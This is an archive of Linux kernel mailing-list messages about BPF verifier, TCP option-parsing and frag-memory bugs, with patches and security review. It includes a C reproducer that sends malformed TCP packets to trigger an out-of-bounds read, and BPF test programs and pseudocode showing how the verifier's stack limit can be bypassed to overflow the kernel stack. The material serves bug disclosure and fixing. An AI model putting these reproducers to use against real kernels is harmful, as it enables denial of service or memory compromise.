Re: [PATCH 0/3] bpf: allow zero-initialising hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 4:27 PM Lorenz Bauer  wrote:
>
> On Mon, 1 Oct 2018 at 20:12, Daniel Borkmann  wrote:
> >
> > On 10/01/2018 12:45 PM, Lorenz Bauer wrote:
> > > This patch set adds a new flag BPF_F_ZERO_SEED, which allows
> > > forcing the seed used by hash maps to zero. This makes
> > > it possible to write deterministic tests.
> > >
> > > Based on an off-list conversation with Alexei Starovoitov and
> > > Daniel Borkmann.
> > >
> > > Lorenz Bauer (3):
> > >   bpf: allow zero-initializing hash map seed
> > >   tools: sync linux/bpf.h
> > >   tools: add selftest for BPF_F_ZERO_SEED
> > >
> > >  include/uapi/linux/bpf.h|  2 +
> > >  kernel/bpf/hashtab.c|  8 ++-
> > >  tools/include/uapi/linux/bpf.h  |  2 +
> > >  tools/testing/selftests/bpf/test_maps.c | 67 +
> > >  4 files changed, 66 insertions(+), 13 deletions(-)
> > >
> >
> > Please respin with proper SoB for each patch and non-empty commit
> > description.
>
> What does SoB mean? Point taken about the empty commit message.

SoB is the Signed-off-by line. See
https://www.kernel.org/doc/html/v4.17/process/submitting-patches.html#sign-your-work-the-developer-s-certificate-of-origin
.


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 4:21 PM Lorenz Bauer  wrote:
> On Fri, 5 Oct 2018 at 15:12, Jann Horn  wrote:
> > On Fri, Oct 5, 2018 at 9:42 AM Lorenz Bauer  wrote:
> > > On Tue, 2 Oct 2018 at 21:00, Jann Horn  wrote:
> > > > If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
> > > > check in here, right? I doubt it matters, but I don't really like
> > > > seeing something like this exposed to unprivileged userspace just
> > > > because you need it for kernel testing.
> > >
> > > That would mean all tests have to run as root / with CAP_SYS_ADMIN
> > > which isn't ideal.
> >
> > This patch basically means that it becomes easier for a local user to
> > construct a BPF hash table that has all of its values stuffed into a
> > single hash bucket, correct? Which makes it easier to create a BPF
> > program that generates unusually large RCU stalls by performing ~4
> > BPF map lookups, each of which has to walk through the entire linked
> > list of the hash map bucket? I dislike exposing something like that to
> > unprivileged userspace.
>
> That's a good point, for which I don't have an answer. You could argue that
> this was the status quo until the seed was randomised, so it seems
> like this hasn't been a worry so far. Should it be going forward?

I don't think that local DoS bugs, or bugs that locally degrade
performance, are a big deal, but I also think that the kernel should
try to avoid having such issues.

> > And if you want to run the whole BPF test suite with all its tests,
> > don't you already need root privileges? Or is this a different test
> > suite?
>
> No, I'm thinking about third parties that want to test their own BPF.

Ah. That wasn't clear to me from your patch description.

Can you please describe exactly why something that is not a kernel
unit test needs deterministic BPF hash map behavior?

> If you enable unprivileged BPF you can use BPF_PROG_TEST_RUN to
> test your programs without root, if I'm not mistaken.


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-05 Thread Jann Horn
On Fri, Oct 5, 2018 at 9:42 AM Lorenz Bauer  wrote:
> On Tue, 2 Oct 2018 at 21:00, Jann Horn  wrote:
> >
> > If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
> > check in here, right? I doubt it matters, but I don't really like
> > seeing something like this exposed to unprivileged userspace just
> > because you need it for kernel testing.
>
> That would mean all tests have to run as root / with CAP_SYS_ADMIN
> which isn't ideal.

This patch basically means that it becomes easier for a local user to
construct a BPF hash table that has all of its values stuffed into a
single hash bucket, correct? Which makes it easier to create a BPF
program that generates unusually large RCU stalls by performing ~4
BPF map lookups, each of which has to walk through the entire linked
list of the hash map bucket? I dislike exposing something like that to
unprivileged userspace.

And if you want to run the whole BPF test suite with all its tests,
don't you already need root privileges? Or is this a different test
suite?


Re: [PATCH 1/3] bpf: allow zero-initializing hash map seed

2018-10-02 Thread Jann Horn
On Mon, Oct 1, 2018 at 12:47 PM Lorenz Bauer  wrote:
>
> Add a new flag BPF_F_ZERO_SEED, which forces a hash map
> to initialize the seed to zero.
> ---
>  include/uapi/linux/bpf.h | 2 ++
>  kernel/bpf/hashtab.c | 8 ++--
>  2 files changed, 8 insertions(+), 2 deletions(-)
>
> diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
> index aa5ccd2385ed..9d15c8f179ac 100644
> --- a/include/uapi/linux/bpf.h
> +++ b/include/uapi/linux/bpf.h
> @@ -252,6 +252,8 @@ enum bpf_attach_type {
>  #define BPF_F_NO_COMMON_LRU(1U << 1)
>  /* Specify numa node during map creation */
>  #define BPF_F_NUMA_NODE(1U << 2)
> +/* Zero-initialize hash function seed */
> +#define BPF_F_ZERO_SEED(1U << 6)
>
>  /* flags for BPF_PROG_QUERY */
>  #define BPF_F_QUERY_EFFECTIVE  (1U << 0)
> diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
> index 2c1790288138..a79e123dae62 100644
> --- a/kernel/bpf/hashtab.c
> +++ b/kernel/bpf/hashtab.c
> @@ -23,7 +23,7 @@
>
>  #define HTAB_CREATE_FLAG_MASK  \
> (BPF_F_NO_PREALLOC | BPF_F_NO_COMMON_LRU | BPF_F_NUMA_NODE |\
> -BPF_F_RDONLY | BPF_F_WRONLY)
> +BPF_F_RDONLY | BPF_F_WRONLY | BPF_F_ZERO_SEED)
>
>  struct bucket {
> struct hlist_nulls_head head;
> @@ -373,7 +373,11 @@ static struct bpf_map *htab_map_alloc(union bpf_attr 
> *attr)
> if (!htab->buckets)
> goto free_htab;
>
> -   htab->hashrnd = get_random_int();
> +   if (htab->map.map_flags & BPF_F_ZERO_SEED)
> +   htab->hashrnd = 0;
> +   else
> +   htab->hashrnd = get_random_int();
> +

If this is for testing only, you can slap a capable(CAP_SYS_ADMIN)
check in here, right? I doubt it matters, but I don't really like
seeing something like this exposed to unprivileged userspace just
because you need it for kernel testing.


requesting stable backport of BPF security fix (commit dd066823db2ac4e22f721ec85190817b58059a54)

2018-09-25 Thread Jann Horn
Hi!

Per the policy at Documentation/networking/netdev-FAQ.rst, I'm sending
this to netdev@ and davem, rather than stable@; with a CC to security@
because I believe that this is a security process issue.

Upstream commit dd066823db2ac4e22f721ec85190817b58059a54
("bpf/verifier: disallow pointer subtraction") fixes a security bug
(kernel pointer leak to unprivileged userspace). The fix has been in
Linus' tree since about a week ago, but the patch still doesn't appear
in Greg's linux-4.18.y linux-stable-rc repo, in Greg's 4.18
stable-queue, or in davem's stable queue at
http://patchwork.ozlabs.org/bundle/davem/stable/?state=* .

Please queue it up for backporting.

I am curious: Why was this not queued up for stable immediately? Or
was it, and I looked in the wrong place?


Re: [PATCH net] inet: frag: enforce memory limits earlier

2018-07-31 Thread Jann Horn
On Tue, Jul 31, 2018 at 7:54 AM Florian Westphal  wrote:
>
> Eric Dumazet  wrote:
> > We currently check current frags memory usage only when
> > a new frag queue is created. This allows attackers to first
> > consume the memory budget (default : 4 MB) creating thousands
> > of frag queues, then sending tiny skbs to exceed high_thresh
> > limit by 2 to 3 order of magnitude.
> >
> > Note that before commit 648700f76b03 ("inet: frags: use rhashtables
> > for reassembly units"), work queue could be starved under DOS,
> > getting no cpu cycles.
> > After commit 648700f76b03, only the per frag queue timer can eventually
> > remove an incomplete frag queue and its skbs.
>
> I'm not sure this is a good idea.
>
> This can now prevent "good" queue from completing just because attacker
> is sending garbage.

There is only a limited amount of memory available to store fragments.
If you receive lots of fragments that don't form complete packets,
you'll have to drop some packets. I don't see why it matters whether
incoming garbage only prevents the creation of new queues or also the
completion of existing queues.


Re: [PATCH v2 net-next 1/4] umh: introduce fork_usermode_blob() helper

2018-05-04 Thread Jann Horn
On Thu, May 3, 2018 at 12:36 AM, Alexei Starovoitov  wrote:
> Introduce helper:
> int fork_usermode_blob(void *data, size_t len, struct umh_info *info);
> struct umh_info {
>struct file *pipe_to_umh;
>struct file *pipe_from_umh;
>pid_t pid;
> };
>
> that GPLed kernel modules (signed or unsigned) can use it to execute part
> of its own data as swappable user mode process.
>
> The kernel will do:
> - mount "tmpfs"
> - allocate a unique file in tmpfs
> - populate that file with [data, data + len] bytes
> - user-mode-helper code will do_execve that file and, before the process
>   starts, the kernel will create two unix pipes for bidirectional
>   communication between kernel module and umh
> - close tmpfs file, effectively deleting it
> - the fork_usermode_blob will return zero on success and populate
>   'struct umh_info' with two unix pipes and the pid of the user process
>
> As the first step in the development of the bpfilter project
> the fork_usermode_blob() helper is introduced to allow user mode code
> to be invoked from a kernel module. The idea is that user mode code plus
> normal kernel module code are built as part of the kernel build
> and installed as traditional kernel module into distro specified location,
> such that from a distribution point of view, there is
> no difference between regular kernel modules and kernel modules + umh code.
> Such modules can be signed, modprobed, rmmod, etc. The use of this new helper
> by a kernel module doesn't make it any special from kernel and user space
> tooling point of view.
[...]
> +static struct vfsmount *umh_fs;
> +
> +static int init_tmpfs(void)
> +{
> +   struct file_system_type *type;
> +
> +   if (umh_fs)
> +   return 0;
> +   type = get_fs_type("tmpfs");
> +   if (!type)
> +   return -ENODEV;
> +   umh_fs = kern_mount(type);
> +   if (IS_ERR(umh_fs)) {
> +   int err = PTR_ERR(umh_fs);
> +
> +   put_filesystem(type);
> +   umh_fs = NULL;
> +   return err;
> +   }
> +   return 0;
> +}

Should init_tmpfs() be holding some sort of mutex if it's fiddling
with `umh_fs`? The current code only calls it in initcall context, but
if that ever changes and two processes try to initialize the tmpfs at
the same time, a few things could go wrong.
I guess Luis' suggestion (putting a call to init_tmpfs() in
do_basic_setup()) might be the easiest way to get rid of that problem.

> +static int alloc_tmpfs_file(size_t size, struct file **filp)
> +{
> +   struct file *file;
> +   int err;
> +
> +   err = init_tmpfs();
> +   if (err)
> +   return err;
> +   file = shmem_file_setup_with_mnt(umh_fs, "umh", size, VM_NORESERVE);
> +   if (IS_ERR(file))
> +   return PTR_ERR(file);
> +   *filp = file;
> +   return 0;
> +}


[PATCH net] bpf: sockmap remove dead check

2018-04-20 Thread Jann Horn
Remove dead code that bails on `attr->value_size > KMALLOC_MAX_SIZE` - the
previous check already bails on `attr->value_size != 4`.

Signed-off-by: Jann Horn <ja...@google.com>
---
 kernel/bpf/sockmap.c | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/kernel/bpf/sockmap.c b/kernel/bpf/sockmap.c
index 8dd9210d7db7..a3b21385e947 100644
--- a/kernel/bpf/sockmap.c
+++ b/kernel/bpf/sockmap.c
@@ -1442,9 +1442,6 @@ static struct bpf_map *sock_map_alloc(union bpf_attr 
*attr)
attr->value_size != 4 || attr->map_flags & ~SOCK_CREATE_FLAG_MASK)
return ERR_PTR(-EINVAL);
 
-   if (attr->value_size > KMALLOC_MAX_SIZE)
-   return ERR_PTR(-E2BIG);
-
err = bpf_tcp_ulp_register();
if (err && err != -EEXIST)
return ERR_PTR(err);
-- 
2.17.0.484.g0c8726318c-goog



[PATCH net] tcp: don't read out-of-bounds opsize

2018-04-20 Thread Jann Horn
The old code reads the "opsize" variable from out-of-bounds memory (first
byte behind the segment) if a broken TCP segment ends directly after an
opcode that is neither EOL nor NOP.

The result of the read isn't used for anything, so the worst thing that
could theoretically happen is a pagefault; and since the physmap is usually
mostly contiguous, even that seems pretty unlikely.

The following C reproducer triggers the uninitialized read - however, you
can't actually see anything happen unless you put something like a
pr_warn() in tcp_parse_md5sig_option() to print the opsize.


#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void systemf(const char *command, ...) {
  char *full_command;
  va_list ap;
  va_start(ap, command);
  if (vasprintf(_command, command, ap) == -1)
err(1, "vasprintf");
  va_end(ap);
  printf("systemf: <<<%s>>>\n", full_command);
  system(full_command);
}

char *devname;

int tun_alloc(char *name) {
  int fd = open("/dev/net/tun", O_RDWR);
  if (fd == -1)
err(1, "open tun dev");
  static struct ifreq req = { .ifr_flags = IFF_TUN|IFF_NO_PI };
  strcpy(req.ifr_name, name);
  if (ioctl(fd, TUNSETIFF, ))
err(1, "TUNSETIFF");
  devname = req.ifr_name;
  printf("device name: %s\n", devname);
  return fd;
}

#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))

void sum_accumulate(unsigned int *sum, void *data, int len) {
  assert((len&2)==0);
  for (int i=0; i> 16) + (sum & 0x);
  sum = (sum >> 16) + (sum & 0x);
  return htons(~sum);
}

void fix_ip_sum(struct iphdr *ip) {
  unsigned int sum = 0;
  sum_accumulate(, ip, sizeof(*ip));
  ip->check = sum_final(sum);
}

void fix_tcp_sum(struct iphdr *ip, struct tcphdr *tcp) {
  unsigned int sum = 0;
  struct {
unsigned int saddr;
unsigned int daddr;
unsigned char pad;
unsigned char proto_num;
unsigned short tcp_len;
  } fakehdr = {
.saddr = ip->saddr,
.daddr = ip->daddr,
.proto_num = ip->protocol,
.tcp_len = htons(ntohs(ip->tot_len) - ip->ihl*4)
  };
  sum_accumulate(, , sizeof(fakehdr));
  sum_accumulate(, tcp, tcp->doff*4);
  tcp->check = sum_final(sum);
}

int main(void) {
  int tun_fd = tun_alloc("inject_dev%d");
  systemf("ip link set %s up", devname);
  systemf("ip addr add 192.168.42.1/24 dev %s", devname);

  struct {
struct iphdr ip;
struct tcphdr tcp;
unsigned char tcp_opts[20];
  } __attribute__((packed)) syn_packet = {
.ip = {
  .ihl = sizeof(struct iphdr)/4,
  .version = 4,
  .tot_len = htons(sizeof(syn_packet)),
  .ttl = 30,
  .protocol = IPPROTO_TCP,
  /* FIXUP check */
  .saddr = IPADDR(192,168,42,2),
  .daddr = IPADDR(192,168,42,1)
},
.tcp = {
  .source = htons(1),
  .dest = htons(1337),
  .seq = 0x12345678,
  .doff = (sizeof(syn_packet.tcp)+sizeof(syn_packet.tcp_opts))/4,
  .syn = 1,
  .window = htons(64),
  .check = 0 /*FIXUP*/
},
.tcp_opts = {
  /* INVALID: trailing MD5SIG opcode after NOPs */
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 1,
  1, 1, 1, 1, 19
}
  };
  fix_ip_sum(_packet.ip);
  fix_tcp_sum(_packet.ip, _packet.tcp);
  while (1) {
int write_res = write(tun_fd, _packet, sizeof(syn_packet));
if (write_res != sizeof(syn_packet))
  err(1, "packet write failed");
  }
}


Fixes: cfb6eeb4c860 ("[TCP]: MD5 Signature Option (RFC2385) support.")
Signed-off-by: Jann Horn <ja...@google.com>
---
 net/ipv4/tcp_input.c | 7 ++-
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 367def6ddeda..e51c644484dc 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -3868,11 +3868,8 @@ const u8 *tcp_parse_md5sig_option(const struct tcphdr 
*th)
int length = (th->doff << 2) - sizeof(*th);
const u8 *ptr = (const u8 *)(th + 1);
 
-   /* If the TCP option is too short, we can short cut */
-   if (length < TCPOLEN_MD5SIG)
-   return NULL;
-
-   while (length > 0) {
+   /* If not enough data remaining, we can short cut */
+   while (length >= TCPOLEN_MD5SIG) {
int opcode = *ptr++;
int opsize;
 
-- 
2.17.0.484.g0c8726318c-goog



Re: nft/bpf interpreters and spectre2. Was: [PATCH RFC 0/4] net: add bpfilter

2018-02-22 Thread Jann Horn
[resend as plaintext, apparently mobile gmail will send HTML mails]

On Thu, Feb 22, 2018 at 3:20 AM, Alexei Starovoitov
 wrote:
> On Wed, Feb 21, 2018 at 01:13:03PM +0100, Florian Westphal wrote:
>>
>> Obvious candidates are: meta, numgen, limit, objref, quota, reject.
>>
>> We should probably also consider removing
>> CONFIG_NFT_SET_RBTREE and CONFIG_NFT_SET_HASH and just always
>> build both too (at least rbtree since that offers interval).
>>
>> For the indirect call issue we can use direct calls from eval loop for
>> some of the more frequently used ones, similar to what we do already
>> for nft_cmp_fast_expr.
>
> nft_cmp_fast_expr and other expressions mentioned above made me thinking...
>
> do we have the same issue with nft interpreter as we had with bpf one?
> bpf interpreter was used as part of spectre2 attack to leak
> information via cache side channel and let VM read hypervisor memory.
> Due to that issue we removed bpf interpreter from the kernel code.
> That's what CONFIG_BPF_JIT_ALWAYS_ON for...
> but we still have nft interpreter in the kernel that can also
> execute arbitrary nft expressions.
>
> Jann's exploit used the following bpf instructions:
[...]
>
> and a gadget to jump into __bpf_prog_run with insn pointing
> to memory controlled by the guest while accessible
> (at different virt address) by the hypervisor.
>
> It seems possible to construct similar sequence of instructions
> out of nft expressions and use gadget that jumps into nft_do_chain().
[...]
> Obviously such exploit is harder to do than bpf based one.
> Do we need to do anything about it ?
> May be it's easier to find gadgets in .text of vmlinux
> instead of messing with interpreters?
>
> Jann,
> can you comment on removing interpreters in general?
> Do we need to worry about having bpf and/or nft interpreter
> in the kernel?

I think that for Spectre V2, the presence of interpreters isn't a big
problem. It simplifies writing attacks a bit, but I don't expect it to
be necessary if an attacker invests some time into finding useful
gadgets.


Re: [PATCH bpf-next 1/2] bpf: fix maximum stack depth tracking logic

2017-12-22 Thread Jann Horn
On Sat, Dec 23, 2017 at 3:07 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Sat, Dec 23, 2017 at 02:38:29AM +0100, Jann Horn wrote:
>> On Fri, Dec 22, 2017 at 10:33 PM, Alexei Starovoitov <a...@kernel.org> wrote:
>> > instead of computing max stack depth for current call chain only
>> > track the maximum possible stack depth of any function at given
>> > frame position. Such algorithm is simple and fast, but conservative,
>> > since it overestimates amount of stack used. Consider:
>> > main() // stack 32
>> > {
>> >   A();
>> >   B();
>> > }
>> >
>> > A(){} // stack 256
>> >
>> > B()  // stack 64
>> > {
>> >   A();
>> > }
>> >
>> > since A() is called at frame[1] and frame[2], the algorithm
>> > will estimate the max stack depth as 32 + 256 + 256 and will reject
>> > such program, though real max is 32 + 64 + 256.
>> >
>> > Fortunately the algorithm is good enough in practice. The alternative
>> > would be to track max stack of every function in the fast pass through
>> > the verifier and then do additional CFG walk just to compute max total.
>> >
>> > Fixes: f4d7e40a5b71 ("bpf: introduce function calls (verification)")
>> > Reported-by: Jann Horn <ja...@google.com>
>> > Signed-off-by: Alexei Starovoitov <a...@kernel.org>
>>
>> Does this work in cases where multiple invocations of a function have
>> different stack access patterns because their inputs have different
>> bounds?
>>
>> Consider this pseudocode example:
>>
>> void main(void) {
>>   func1(0);
>>   func1(1);
>>   func2(1);
>> }
>> void func1(int alloc_or_recurse) {
>>   if (alloc_or_recurse) {
>> frame_pointer[-300] = 1;
>>   } else {
>> func2(alloc_or_recurse);
>>   }
>> }
>> void func2(int alloc_or_recurse) {
>>   if (alloc_or_recurse) {
>> frame_pointer[-300] = 1;
>>   }
>> }
>>
>> AFAICS this will work as follows:
>>
>> Call to func1->func2 runs without any stack accesses because the
>> verifier can prove that alloc_or_recurse is 0.
>
> argh. right.
> I guess that ruins my attemp to do the stack check inline
> with the main verifier pass.
> Do you see an algorithm that can do it without extra
> cfg walk at the end?

A crappy heuristic would be to forbid recursion (calling a function
that is already present somewhere in the call stack) and then sum up
the maximum stack depths of all functions at the end and see whether
the sum is bigger than the maximum stack size. While it'd be horribly
conservative, it might work for now? 512 bytes are a lot of stack.
Or as a more complicated, but slightly less conservative heuristic,
you could forbid recursion, record the maximum number of stack frames
(max_stack_frames), then at the end select the top max_stack_frames
functions with the biggest stack sizes and sum up their sizes? (Or if
you want to support recursion, check
max_stack_frames*biggest_frame_size<=MAX_BPF_STACK.)
Anything else I can come up with is probably more complicated than an
extra cfg walk.


Re: [PATCH bpf-next 1/2] bpf: fix maximum stack depth tracking logic

2017-12-22 Thread Jann Horn
On Fri, Dec 22, 2017 at 10:33 PM, Alexei Starovoitov <a...@kernel.org> wrote:
> instead of computing max stack depth for current call chain only
> track the maximum possible stack depth of any function at given
> frame position. Such algorithm is simple and fast, but conservative,
> since it overestimates amount of stack used. Consider:
> main() // stack 32
> {
>   A();
>   B();
> }
>
> A(){} // stack 256
>
> B()  // stack 64
> {
>   A();
> }
>
> since A() is called at frame[1] and frame[2], the algorithm
> will estimate the max stack depth as 32 + 256 + 256 and will reject
> such program, though real max is 32 + 64 + 256.
>
> Fortunately the algorithm is good enough in practice. The alternative
> would be to track max stack of every function in the fast pass through
> the verifier and then do additional CFG walk just to compute max total.
>
> Fixes: f4d7e40a5b71 ("bpf: introduce function calls (verification)")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Alexei Starovoitov <a...@kernel.org>

Does this work in cases where multiple invocations of a function have
different stack access patterns because their inputs have different
bounds?

Consider this pseudocode example:

void main(void) {
  func1(0);
  func1(1);
  func2(1);
}
void func1(int alloc_or_recurse) {
  if (alloc_or_recurse) {
frame_pointer[-300] = 1;
  } else {
func2(alloc_or_recurse);
  }
}
void func2(int alloc_or_recurse) {
  if (alloc_or_recurse) {
frame_pointer[-300] = 1;
  }
}

AFAICS this will work as follows:

Call to func1->func2 runs without any stack accesses because the
verifier can prove that alloc_or_recurse is 0.
Second call to func1 allocates stack memory, bumping up
frame_stack_depth[1].
Second call to func2 allocates stack memory, leaving
frame_stack_depth[1] the same.

So I think this will still pass the verifier, even though func1
and func2 will end up with 300 bytes stack memory each, causing
the func1->func2 call to use more stack memory than permitted.


Re: correctness of BPF stack size checking logic for multi-function programs?

2017-12-22 Thread Jann Horn
On Fri, Dec 22, 2017 at 4:37 AM, Alexei Starovoitov
<alexei.starovoi...@gmail.com> wrote:
> On Fri, Dec 22, 2017 at 02:14:45AM +0100, Jann Horn wrote:
>> Hi!
>>
>> I saw the recently-added support for multiple functions in a single
>> program in BPF. I've stumbled over something that looks like it might
>> be a bug; I haven't verified it yet, but I thought I should give you a
>> heads-up before this lands in a release in case I'm right. If I'm
>> wrong, it might be worth adding a comment to stacksafe() that explains
>> why.
[...]
> but I will rewrite a test case for it unless you beat me to it :)

I just sent a failing test case for the case I'm talking about, subject
"[PATCH] bpf: selftest for late caller stack size increase".


[PATCH] bpf: selftest for late caller stack size increase

2017-12-22 Thread Jann Horn
This checks that it is not possible to bypass the total stack size check in
update_stack_depth() by calling a function that uses a large amount of
stack memory *before* using a large amount of stack memory in the caller.

Currently, the first added testcase causes a rejection as expected, but
the second testcase is (AFAICS incorrectly) accepted:

[...]
#483/p calls: stack overflow using two frames (post-call access) FAIL
Unexpected success to load!
0: (85) call pc+2
caller:
 R10=fp0,call_-1
callee:
 frame1: R1=ctx(id=0,off=0,imm=0) R10=fp0,call_0
3: (72) *(u8 *)(r10 -300) = 0
4: (b7) r0 = 0
5: (95) exit
returning from callee:
 frame1: R0_w=inv0 R1=ctx(id=0,off=0,imm=0) R10=fp0,call_0
to caller at 1:
 R0_w=inv0 R10=fp0,call_-1

from 5 to 1: R0=inv0 R10=fp0,call_-1
1: (72) *(u8 *)(r10 -300) = 0
2: (95) exit
processed 6 insns, stack depth 300+300
[...]
Summary: 704 PASSED, 1 FAILED

AFAICS the JIT-generated code for the second testcase shows that this
really causes the stack pointer to be decremented by 300+300:

first function:
  55push rbp
0001  4889E5mov rbp,rsp
0004  4881EC5801sub rsp,0x158
000B  4883ED28  sub rbp,byte +0x28
[...]
0025  E89AB3AFE5call 0xe5afb3c4
002A  C685D4FE00mov byte [rbp-0x12c],0x0
[...]
0041  4883C528  add rbp,byte +0x28
0045  C9leave
0046  C3ret

second function:
  55push rbp
0001  4889E5mov rbp,rsp
0004  4881EC5801sub rsp,0x158
000B  4883ED28  sub rbp,byte +0x28
[...]
0025  C685D4FE00mov byte [rbp-0x12c],0x0
[...]
003E  4883C528  add rbp,byte +0x28
0042  C9leave
0043  C3ret

Signed-off-by: Jann Horn <ja...@google.com>
---
 tools/testing/selftests/bpf/test_verifier.c | 34 +
 1 file changed, 34 insertions(+)

diff --git a/tools/testing/selftests/bpf/test_verifier.c 
b/tools/testing/selftests/bpf/test_verifier.c
index 3bacff0d6f91..71fb0be81b78 100644
--- a/tools/testing/selftests/bpf/test_verifier.c
+++ b/tools/testing/selftests/bpf/test_verifier.c
@@ -8729,6 +8729,40 @@ static struct bpf_test tests[] = {
.prog_type = BPF_PROG_TYPE_XDP,
.result = ACCEPT,
},
+   {
+   "calls: stack overflow using two frames (pre-call access)",
+   .insns = {
+   /* prog 1 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 1, 0, 1),
+   BPF_EXIT_INSN(),
+
+   /* prog 2 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_MOV64_IMM(BPF_REG_0, 0),
+   BPF_EXIT_INSN(),
+   },
+   .prog_type = BPF_PROG_TYPE_XDP,
+   .errstr = "combined stack size",
+   .result = REJECT,
+   },
+   {
+   "calls: stack overflow using two frames (post-call access)",
+   .insns = {
+   /* prog 1 */
+   BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 1, 0, 2),
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_EXIT_INSN(),
+
+   /* prog 2 */
+   BPF_ST_MEM(BPF_B, BPF_REG_10, -300, 0),
+   BPF_MOV64_IMM(BPF_REG_0, 0),
+   BPF_EXIT_INSN(),
+   },
+   .prog_type = BPF_PROG_TYPE_XDP,
+   .errstr = "combined stack size",
+   .result = REJECT,
+   },
{
"calls: spill into caller stack frame",
.insns = {
-- 
2.15.1.620.gb9897f4670-goog



correctness of BPF stack size checking logic for multi-function programs?

2017-12-21 Thread Jann Horn
Hi!

I saw the recently-added support for multiple functions in a single
program in BPF. I've stumbled over something that looks like it might
be a bug; I haven't verified it yet, but I thought I should give you a
heads-up before this lands in a release in case I'm right. If I'm
wrong, it might be worth adding a comment to stacksafe() that explains
why.

stacksafe() has the following code:

/* if explored stack has more populated slots than current stack
* such stacks are not equivalent
*/
if (old->allocated_stack > cur->allocated_stack)
return false;

Note that if the old state had a smaller stack than the new state,
that is permitted because it is guaranteed that none of the extra
space in the new state will be used.

However, as far as I can tell, this can be used to smuggle a call
chain with a total stack size bigger than the permitted maximum
through the verifier, with code roughly as follows:

void b(void) {
  
}
void main(void) {
  if () {

  }
  b();
}

AFAICS, if the verifier first verifies the branch of main() where
 is false, it will go down into b, seeing a total stack
size of around 300 bytes. Afterwards, it will verify the branch of
main() where  is true, but the states will converge after
the branch, preventing the verifier from going down into b() again and
discovering through update_stack_depth() that actually, the total
stack size is around 600 bytes. From a coarse look, it seems like this
might be usable to overflow the kernel stack, which would be
exploitable on systems without vmapped stack?

And actually, you could probably even trigger it with something like
this, since the stack is always fully allocated on function entry:

void b(void) {
  
}
void main(void) {
  b();
  
}

So I think it might be necessary to do an extra pass for the stack
depth checking when all the stackframe sizes are known?


Re: [PATCH net 1/2] bpf/verifier: fix bounds calculation on BPF_RSH

2017-12-05 Thread Jann Horn
On Tue, Dec 5, 2017 at 8:15 PM, Edward Cree <ec...@solarflare.com> wrote:
> Incorrect signed bounds were being computed, although this had no effect
>  since the propagation in __reg_deduce_bounds() happened to overwrite them.
>
> Fixes: b03c9f9fdc37 ("bpf/verifier: track signed and unsigned min/max values")
> Reported-by: Jann Horn <ja...@google.com>
> Signed-off-by: Edward Cree <ec...@solarflare.com>
> ---
>  kernel/bpf/verifier.c | 30 --
>  1 file changed, 16 insertions(+), 14 deletions(-)
>
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index d4593571c404..5bed7f773c87 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
> @@ -2184,20 +2184,22 @@ static int adjust_scalar_min_max_vals(struct 
> bpf_verifier_env *env,
> mark_reg_unknown(env, regs, insn->dst_reg);
> break;
> }
> -   /* BPF_RSH is an unsigned shift, so make the appropriate 
> casts */
> -   if (dst_reg->smin_value < 0) {
> -   if (umin_val) {
> -   /* Sign bit will be cleared */
> -   dst_reg->smin_value = 0;
> -   } else {
> -   /* Lost sign bit information */
> -   dst_reg->smin_value = S64_MIN;
> -   dst_reg->smax_value = S64_MAX;
> -   }
> -   } else {
> -   dst_reg->smin_value =
> -   (u64)(dst_reg->smin_value) >> umax_val;
> -   }
> +   /* BPF_RSH is an unsigned shift.  If the value in dst_reg 
> might
> +* be negative, then either:
> +* 1) src_reg might be zero, so the sign bit of the result is
> +*unknown, so we lose our signed bounds
> +* 2) it's known negative, thus the unsigned bounds capture 
> the
> +*signed bounds
> +* 3) the signed bounds cross zero, so they tell us nothing
> +*about the result
> +* If the value in dst_reg is known nonnegative, then again 
> the
> +* unsigned bounts capture the signed bounds.
> +* Thus, in all cases it suffices to blow away our signed 
> bounds
> +* and rely on inferring new ones from the unsigned bounds and
> +* var_off of the result.
> +*/
> +   dst_reg->smin_value = S64_MIN;
> +   dst_reg->smax_value = S64_MAX;
> if (src_known)
> dst_reg->var_off = tnum_rshift(dst_reg->var_off,
>umin_val);
>

Reviewed-by: Jann Horn <ja...@google.com>


Re: BPF: bug without effect in BPF_RSH case of adjust_scalar_min_max_vals()

2017-12-04 Thread Jann Horn
On Mon, Dec 4, 2017 at 6:03 PM, Jann Horn <ja...@google.com> wrote:
> As far as I can tell, commit b03c9f9fdc37 ("bpf/verifier: track signed
> and unsigned min/max values") introduced the following effectless bug
> in the BPF_RSH case of adjust_scalar_min_max_vals() (unless that's
> intentional):
[...]
> ===
> BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
>
> BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
> BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
> BPF_MOV32_IMM(BPF_REG_ARG2, 1),
> BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
> BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
